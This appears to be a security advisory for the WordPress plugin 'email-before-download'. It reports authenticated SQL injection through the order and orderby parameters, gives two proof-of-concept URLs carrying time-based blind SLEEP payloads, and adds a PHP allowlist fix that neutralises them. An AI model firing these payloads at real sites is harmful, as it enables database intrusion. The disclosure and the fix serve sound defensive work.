The plugin does not properly validate and escape the order and orderby GET parameters before using them in SQL statements, leading to authenticated SQL injection issues.
https://example.com/wp-admin/admin.php?page=email-before-download-links&order=desc&orderby=time_requested+AND+%28SELECT+1554+FROM+%28SELECT%28SLEEP%285%29%29%29gPZH%29

https://example.com/wp-admin/admin.php?page=email-before-download-links&orderby=time_requested&order=+AND+%28SELECT+42+FROM+%28SELECT%28SLEEP%285%29%29%29b%29
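
An added example of the usual fix for this class of bug, not the plugin's own code: a sort column and direction cannot be bound as quoted values, so both are checked against an allowlist before they reach the ORDER BY clause. The function name, the constant and every column name other than time_requested are assumptions made for illustration.

```php
<?php
// Added example, not the plugin's code.
// Assumption: the sortable columns. Only time_requested appears in the advisory;
// the others are hypothetical.
const EBD_SORTABLE_COLUMNS = ['time_requested', 'email', 'id'];

/**
 * Build an ORDER BY clause from request parameters (hypothetical helper).
 * Anything that is not an exact allowlisted column or ASC/DESC is replaced
 * by a fixed default, so request text is never copied into the SQL string.
 */
function ebd_safe_order_clause(array $query): string
{
    $orderby = (isset($query['orderby']) && is_string($query['orderby']))
        ? $query['orderby'] : '';
    $order = (isset($query['order']) && is_string($query['order']))
        ? strtoupper(trim($query['order'])) : '';

    // Strict comparison against known column names; no pattern matching.
    if (!in_array($orderby, EBD_SORTABLE_COLUMNS, true)) {
        $orderby = 'time_requested';
    }
    // Direction is one of two literals, nothing else.
    if ($order !== 'ASC' && $order !== 'DESC') {
        $order = 'DESC';
    }
    return "ORDER BY `{$orderby}` {$order}";
}

// Constructed inputs: one normal request and the two URL-decoded
// parameter values from the proof-of-concept URLs above.
$samples = [
    ['orderby' => 'time_requested', 'order' => 'desc'],
    ['orderby' => 'time_requested AND (SELECT 1554 FROM (SELECT(SLEEP(5)))gPZH)',
     'order'   => 'desc'],
    ['orderby' => 'time_requested',
     'order'   => ' AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)'],
    ['orderby' => ['nested'], 'order' => null], // non-string input
];

foreach ($samples as $sample) {
    echo ebd_safe_order_clause($sample), PHP_EOL;
}
```

All four samples yield the same fixed clause, ORDER BY `time_requested` DESC, because the injected values fail the exact-match checks and fall back to the defaults.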
bl4derunner
Anton Sarsadskikh
Yes
2021-11-01 (about 6 months ago)
2021-11-01 (about 6 months ago)
2022-04-09 (about 1 months ago)